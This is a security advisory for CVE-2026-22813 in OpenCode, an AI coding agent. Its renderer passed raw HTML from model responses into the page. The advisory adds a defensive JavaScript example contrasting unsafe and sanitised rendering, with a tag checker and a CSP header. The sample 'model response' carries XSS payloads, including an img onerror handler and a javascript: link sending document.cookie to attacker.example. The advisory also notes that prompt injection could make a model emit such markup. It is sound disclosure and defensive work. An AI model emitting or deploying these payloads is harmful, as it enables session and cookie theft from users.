PT-2026-2316 · Opencode · Opencode

Albertspedersen

·

Published

2026-01-12

·

Updated

2026-03-05

·

CVE-2026-22813

CVSS v4.0

9.4

Critical

Vector: AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Name of the Vulnerable Software and Affected Versions: OpenCode versions prior to 1.1.10
Description: The software is an open source AI coding agent. The markdown renderer used for responses from large language models (LLMs) inserts the HTML it produces into the Document Object Model (DOM) without sanitization, so raw HTML contained in a model response reaches the page unchanged. The web interface sets no Content Security Policy (CSP) that would block JavaScript execution from injected HTML. An attacker who can influence the LLM response in a chat session can therefore execute JavaScript on the 'http://localhost:4096' origin.
Recommendations: Update to version 1.1.10 or later.
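The following is an added example, not OpenCode's code, to make the description concrete: a toy markdown renderer with the vulnerable behaviour (raw HTML and link URLs reach the DOM verbatim) beside a sanitising one, an output check that flags any tag or attribute the renderer did not itself emit, and a nonce-based CSP header value. The markdown dialect, the constructed model response, the `unexpectedTags` and `cspHeader` helpers and the policy they encode are assumptions for illustration; the page does not describe the upstream fix. It also goes beyond the advisory's specific case by covering `javascript:` link URLs, a second script vector that escaping raw HTML alone does not close.

```javascript
// Added example (not OpenCode's code): a toy markdown-to-HTML renderer in two
// modes, to show how a model response becomes XSS when raw HTML is passed
// through, and what the sanitised path looks like. The dialect (bold, inline
// code, links), the response below and the CSP are all constructed for this
// illustration; the advisory does not describe the upstream fix.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Turn every HTML-significant character into an entity so the browser treats
// the model's text as text, never as markup.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Link URLs are a second script vector that escaping alone does not cover:
// `[x](javascript:...)` is valid markdown. Allow-list schemes; relative URLs
// (no scheme) are fine. Browsers drop ASCII tab/CR/LF inside a URL, so strip
// them before looking at the scheme or "java\tscript:" slips through.
function isSafeHref(url) {
  const cleaned = url.trim().replace(/[\t\n\r]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return scheme === null || /^(https?|mailto)$/i.test(scheme[1]);
}

function safeHref(url) {
  return isSafeHref(url) ? url.trim() : '#';
}

// Markdown tokens: [text](url) | `code` | **bold** | plain run. The last
// alternative matches any single leftover character, so every position matches.
const TOKEN = /\[([^\]]+)\]\(([^)\s]+)\)|`([^`]+)`|\*\*([^*]+)\*\*|([^\[`*]+|[\[`*])/g;

// sanitize:false is the vulnerable behaviour from the advisory: text and URLs
// reach the DOM verbatim. sanitize:true escapes text and allow-lists hrefs.
function renderMarkdown(markdown, { sanitize }) {
  const text = (s) => (sanitize ? escapeHtml(s) : s);
  const href = (u) => (sanitize ? escapeHtml(safeHref(u)) : u);
  let out = '';
  for (const m of markdown.matchAll(TOKEN)) {
    if (m[1] !== undefined) out += `<a href="${href(m[2])}">${text(m[1])}</a>`;
    else if (m[3] !== undefined) out += `<code>${text(m[3])}</code>`;
    else if (m[4] !== undefined) out += `<strong>${text(m[4])}</strong>`;
    else out += text(m[5]);
  }
  return `<p>${out}</p>`;
}

// Output check a renderer test suite can run: the HTML may contain only the
// tags the renderer itself emits, with no attributes except a safe href on <a>.
const ALLOWED_TAGS = new Set(['p', 'a', 'code', 'strong']);
function unexpectedTags(html) {
  const problems = [];
  for (const m of html.matchAll(/<(\/?)([a-z][a-z0-9]*)\b([^>]*)>/gi)) {
    const [, closing, rawTag, rawAttrs] = m;
    const tag = rawTag.toLowerCase();
    const attrs = rawAttrs.trim();
    if (!ALLOWED_TAGS.has(tag)) { problems.push(tag); continue; }
    if (closing) continue;
    if (tag === 'a') {
      const hrefMatch = /^href="([^"]*)"$/.exec(attrs);
      if (!hrefMatch || !isSafeHref(hrefMatch[1])) problems.push(`a[href=${hrefMatch ? hrefMatch[1] : attrs}]`);
    } else if (attrs !== '') {
      problems.push(`${tag}[${attrs}]`);
    }
  }
  return problems;
}

// A response-header value (assumed policy, not OpenCode's) that would stop
// injected markup from running script even if the renderer regressed: only
// scripts carrying the per-response nonce execute, and without 'unsafe-inline'
// inline event handlers and javascript: URLs are refused by the browser.
function cspHeader(nonce) {
  return ["default-src 'self'", `script-src 'nonce-${nonce}'`, "object-src 'none'", "base-uri 'none'"].join('; ');
}

// Constructed "model response": helpful text with an injected tag and a
// javascript: link, the kind of content prompt injection could make a model emit.
const LLM_RESPONSE = [
  'Run **npm audit** first.',
  '<img src=x onerror="fetch(\'/api/session\')">',
  "Then read [the docs](javascript:location.href='http://attacker.example/?c='+document.cookie).",
].join(' ');

console.log('unsafe :', renderMarkdown(LLM_RESPONSE, { sanitize: false }));
console.log('safe   :', renderMarkdown(LLM_RESPONSE, { sanitize: true }));
console.log('unsafe problems:', unexpectedTags(renderMarkdown(LLM_RESPONSE, { sanitize: false })));
console.log('safe problems  :', unexpectedTags(renderMarkdown(LLM_RESPONSE, { sanitize: true })));
console.log('CSP:', cspHeader('r4nd0m'));
```

Run it with node. With `sanitize: false` the injected `<img onerror>` and the `javascript:` href survive into the output string, which is the condition the advisory describes; with `sanitize: true` the tag becomes inert text and the link collapses to `#`, and `unexpectedTags` returns an empty list. The CSP value is defence in depth rather than a substitute for sanitising: a policy without `'unsafe-inline'` makes the browser refuse inline handlers and `javascript:` URLs even if a later renderer change reintroduces raw HTML.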

Exploit

Fix

RCE

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-22813
GHSA-C83V-7274-4VGP

Affected Products

Opencode